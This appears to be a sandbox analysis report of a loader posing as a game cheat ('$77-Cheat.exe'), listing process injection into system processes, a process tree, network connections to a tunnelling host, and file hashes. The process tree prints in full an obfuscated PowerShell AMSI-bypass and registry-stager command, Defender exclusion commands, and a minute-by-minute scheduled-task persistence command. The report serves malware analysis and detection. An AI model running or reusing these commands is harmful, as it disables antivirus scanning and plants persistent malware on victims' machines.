PID 1436 wrote to memory of 2368 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1436 wrote to memory of 2368 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1436 wrote to memory of 2368 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1436 wrote to memory of 2368 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2368 wrote to memory of 644 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 2368 wrote to memory of 708 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 2368 wrote to memory of 1008 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2368 wrote to memory of 772 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 2368 wrote to memory of 736 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2368 wrote to memory of 640 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2368 wrote to memory of 1068 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2368 wrote to memory of 1156 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2368 wrote to memory of 1172 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2368 wrote to memory of 1208 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2368 wrote to memory of 1268 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2368 wrote to memory of 1344 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2368 wrote to memory of 1420 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2368 wrote to memory of 1456 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2368 wrote to memory of 1524 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2368 wrote to memory of 1532 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2368 wrote to memory of 1540 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2368 wrote to memory of 1696 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2368 wrote to memory of 1764 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2368 wrote to memory of 1772 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2368 wrote to memory of 1872 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2368 wrote to memory of 1892 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2368 wrote to memory of 1960 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2368 wrote to memory of 1976 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2368 wrote to memory of 1796 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2368 wrote to memory of 2052 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2368 wrote to memory of 2136 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\spoolsv.exe
PID 2368 wrote to memory of 2252 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2368 wrote to memory of 2432 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2368 wrote to memory of 2440 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2368 wrote to memory of 2484 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2368 wrote to memory of 2560 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2368 wrote to memory of 2576 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2368 wrote to memory of 2592 N/A C:\Windows\System32\dllhost.exe C:\Windows\sysmon.exe
PID 2368 wrote to memory of 2636 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2368 wrote to memory of 2644 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2368 wrote to memory of 2692 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2368 wrote to memory of 1084 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\sihost.exe
PID 2368 wrote to memory of 1040 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\wbem\unsecapp.exe
PID 2368 wrote to memory of 724 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2368 wrote to memory of 3344 N/A C:\Windows\System32\dllhost.exe C:\Windows\Explorer.EXE
PID 2368 wrote to memory of 3472 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2368 wrote to memory of 3532 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2368 wrote to memory of 3892 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\RuntimeBroker.exe
PID 2368 wrote to memory of 3972 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\RuntimeBroker.exe
PID 2368 wrote to memory of 4004 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe
PID 2368 wrote to memory of 3524 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2368 wrote to memory of 4356 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe
PID 2368 wrote to memory of 4372 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2368 wrote to memory of 2512 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2368 wrote to memory of 1200 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Users\Admin\AppData\Local\Temp\$77-Loader.exe

"C:\Users\Admin\AppData\Local\Temp\$77-Loader.exe"

C:\Users\Admin\$77-Cheat.exe

"C:\Users\Admin\$77-Cheat.exe"

C:\Users\Admin\Install.exe

"C:\Users\Admin\Install.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:LTCnyNHdztcb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$nhTjxuXMgwSnPt,[Parameter(Position=1)][Type]$EqGTtXfdrl)$pGZEImqoxnv=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+[Char](108)+''+'e'+''+[Char](99)+''+'t'+''+'e'+''+'d'+'D'+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+'e'+[Char](109)+''+[Char](111)+'ry'+'M'+''+[Char](111)+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+'eTy'+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+'s'+[Char](44)+''+[Char](80)+'u'+'b'+'lic'+[Char](44)+''+'S'+''+'e'+''+[Char](97)+''+[Char](108)+'e'+'d'+''+','+''+'A'+''+[Char](110)+''+'s'+'iCl'+[Char](97)+''+[Char](115)+'s'+','+'A'+'u'+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pGZEImqoxnv.DefineConstructor(''+'R'+'T'+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+'al'+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+''+'H'+'ide'+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$nhTjxuXMgwSnPt).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+'m'+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');$pGZEImqoxnv.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g,N'+'e'+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+'tu'+[Char](97)+''+[Char](108)+'',$EqGTtXfdrl,$nhTjxuXMgwSnPt).SetImplementationFlags('R'+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $pGZEImqoxnv.CreateType();}$jjLDGsaifncvH=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+'d'+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+''+[Char](111)+'s'+'o'+''+[Char](102)+'t'+'.'+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+'2'+'.'+''+[Char](85)+''+'n'+'s'+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+[Char](97)+''+'t'+''+'i'+'veM'+'e'+'t'+[Char](104)+''+[Char](111)+'d'+[Char](115)+'');$skOKClKkCAsJZm=$jjLDGsaifncvH.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+''+'c'+'A'+'d'+''+[Char](100)+''+[Char](114)+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+'t'+'a'+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DSnShfFTYMVdpoMdaZj=LTCnyNHdztcb @([String])([IntPtr]);$mONIkZYCcXgmcrgtPANTyh=LTCnyNHdztcb @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$mrZzlMcMqOy=$jjLDGsaifncvH.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+[Char](110)+''+[Char](101)+'l3'+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$YNrktiXxqqdtHx=$skOKClKkCAsJZm.Invoke($Null,@([Object]$mrZzlMcMqOy,[Object](''+[Char](76)+'o'+[Char](97)+''+'d'+''+[Char](76)+'i'+[Char](98)+''+[Char](114)+'ar'+[Char](121)+'A')));$qQntDfURWodEDtnRF=$skOKClKkCAsJZm.Invoke($Null,@([Object]$mrZzlMcMqOy,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+'P'+''+'r'+'ot'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$jRdeTzG=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YNrktiXxqqdtHx,$DSnShfFTYMVdpoMdaZj).Invoke(''+'a'+''+[Char](109)+''+'s'+''+'i'+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'');$QCEvDviwYNSvPFXVP=$skOKClKkCAsJZm.Invoke($Null,@([Object]$jRdeTzG,[Object]('A'+[Char](109)+''+'s'+''+'i'+'S'+[Char](99)+''+'a'+''+'n'+''+'B'+''+[Char](117)+''+[Char](102)+''+'f'+''+'e'+''+'r'+'')));$vJOLYMWVIB=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qQntDfURWodEDtnRF,$mONIkZYCcXgmcrgtPANTyh).Invoke($QCEvDviwYNSvPFXVP,[uint32]8,4,[ref]$vJOLYMWVIB);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$QCEvDviwYNSvPFXVP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qQntDfURWodEDtnRF,$mONIkZYCcXgmcrgtPANTyh).Invoke($QCEvDviwYNSvPFXVP,[uint32]8,0x20,[ref]$vJOLYMWVIB);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+'T'+'W'+'A'+''+[Char](82)+''+'E'+'').GetValue('$'+'7'+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+'a'+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{fbc5ef23-d524-4bb5-beeb-7aa876c95125}

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\$77-Cheat.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-Cheat.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\$77-Powershell.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-Powershell.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-Powershell" /tr "C:\Users\Admin\$77-Powershell.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\$77-Powershell.exe

C:\Users\Admin\$77-Powershell.exe

C:\Users\Admin\$77-Powershell.exe

C:\Users\Admin\$77-Powershell.exe

C:\Users\Admin\$77-Powershell.exe

C:\Users\Admin\$77-Powershell.exe

C:\Users\Admin\$77-Powershell.exe

C:\Users\Admin\$77-Powershell.exe

C:\Users\Admin\$77-Powershell.exe

C:\Users\Admin\$77-Powershell.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp
GB 140.238.91.110:9979 uk2.localto.net tcp

Files

memory/4624-0-0x00007FF887AD3000-0x00007FF887AD5000-memory.dmp

memory/4624-1-0x00000000000C0000-0x000000000010A000-memory.dmp

C:\Users\Admin\$77-Cheat.exe

MD5 419a7b960bc493733acab7a685e22cf7
SHA1 bfed97bc33a336e2c696e1e1541bce0206d6fabc
SHA256 dae0d531b5e148bbaf889de678b328f1e798b790aac68927526e47acc7459669
SHA512 dc00eebd3a7191f222b8620a52e896d3ecbf8e3381f1b186553c807d3da75e6466b01ff77d7f117af540da6e5da277dd6ac27e7f5aa64fba416c6ce9b736e114

C:\Users\Admin\Install.exe

MD5 b51552b77057c2405f73bbbf9c89234a
SHA1 4793adbba023f90d2d2ad0ec55199c56de815224
SHA256 720e6962d75e37e8b47b160c5b3f60433a341f00abf60041630116b26858fbb0
SHA512 564f4104e6e398eeef8acc7ce7cab694b6eebbe4233b7cb359829242b949dc7c5bf124a550a4d0402eb7da19b8bec6c1f6753563b17a8ae36fb639be595b8d66

memory/4856-49-0x0000000000DB0000-0x0000000000DCC000-memory.dmp

memory/4856-50-0x00007FF887AD0000-0x00007FF888592000-memory.dmp

C:\Windows\Temp\__PSScriptPolicyTest_rdqw25io.dpg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1436-58-0x00000218F2490000-0x00000218F24B2000-memory.dmp

memory/1436-60-0x00000218F2820000-0x00000218F284A000-memory.dmp

memory/1436-61-0x00007FF8A8920000-0x00007FF8A8B29000-memory.dmp

memory/1436-62-0x00007FF8A87F0000-0x00007FF8A88AD000-memory.dmp

memory/2368-66-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2368-68-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2368-65-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2368-64-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2368-63-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2368-72-0x00007FF8A87F0000-0x00007FF8A88AD000-memory.dmp

memory/2368-71-0x00007FF8A8920000-0x00007FF8A8B29000-memory.dmp

memory/2368-73-0x0000000140000000-0x0000000140008000-memory.dmp

memory/644-76-0x000002702B800000-0x000002702B825000-memory.dmp

memory/644-77-0x000002702B830000-0x000002702B85A000-memory.dmp

memory/644-84-0x00007FF8689B0000-0x00007FF8689C0000-memory.dmp

memory/708-88-0x00000169579D0000-0x00000169579FA000-memory.dmp

memory/1008-103-0x0000023DA3690000-0x0000023DA36BA000-memory.dmp

memory/1008-104-0x00007FF8689B0000-0x00007FF8689C0000-memory.dmp

memory/772-114-0x00007FF8689B0000-0x00007FF8689C0000-memory.dmp

memory/736-124-0x00007FF8689B0000-0x00007FF8689C0000-memory.dmp

memory/736-123-0x00000285837B0000-0x00000285837DA000-memory.dmp

memory/736-118-0x00000285837B0000-0x00000285837DA000-memory.dmp

memory/772-113-0x0000011A59460000-0x0000011A5948A000-memory.dmp

memory/772-108-0x0000011A59460000-0x0000011A5948A000-memory.dmp

memory/1008-98-0x0000023DA3690000-0x0000023DA36BA000-memory.dmp

memory/708-94-0x00007FF8689B0000-0x00007FF8689C0000-memory.dmp

memory/644-83-0x000002702B830000-0x000002702B85A000-memory.dmp

memory/708-93-0x00000169579D0000-0x00000169579FA000-memory.dmp

memory/644-78-0x000002702B830000-0x000002702B85A000-memory.dmp

memory/4856-648-0x00007FF887AD0000-0x00007FF888592000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d0a4a3b9a52b8fe3b019f6cd0ef3dad6
SHA1 fed70ce7834c3b97edbd078eccda1e5effa527cd
SHA256 21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31
SHA512 1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c8e142ee24a77ad7f21f6a741d48c8da
SHA1 2f174ae49dd03c3b2acd2f9cb2f4e1913908e749
SHA256 e81cbecfdbc457b5d8aad1fbd1dc29ab05e6425e9921bff30089f074ddfc6961
SHA512 ea1c13f3c559afbdfd63a6ecd2ca354612c3c29c2716156d5afcafe6d3fbd0e7eca7b1f03e68f3a28c78cbea5ec430285fa699facad72fc52a37fca207999799

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8cb7f4b4ab204cacd1af6b29c2a2042c
SHA1 244540c38e33eac05826d54282a0bfa60340d6a1
SHA256 4994013dabe4f131d401879278eee147add6349124ea6452358dca7e2344c7a6
SHA512 7651cb6863a425840db610253151e271d3e8da26a8c633ce484247266fa226792ecb84b9578df3ab17fef84a5dfcad417b63a7df59c9650a907e08d59b91dd6e

memory/4856-828-0x00007FF887AD0000-0x00007FF888592000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-Powershell.exe.log

MD5 2cbbb74b7da1f720b48ed31085cbd5b8
SHA1 79caa9a3ea8abe1b9c4326c3633da64a5f724964
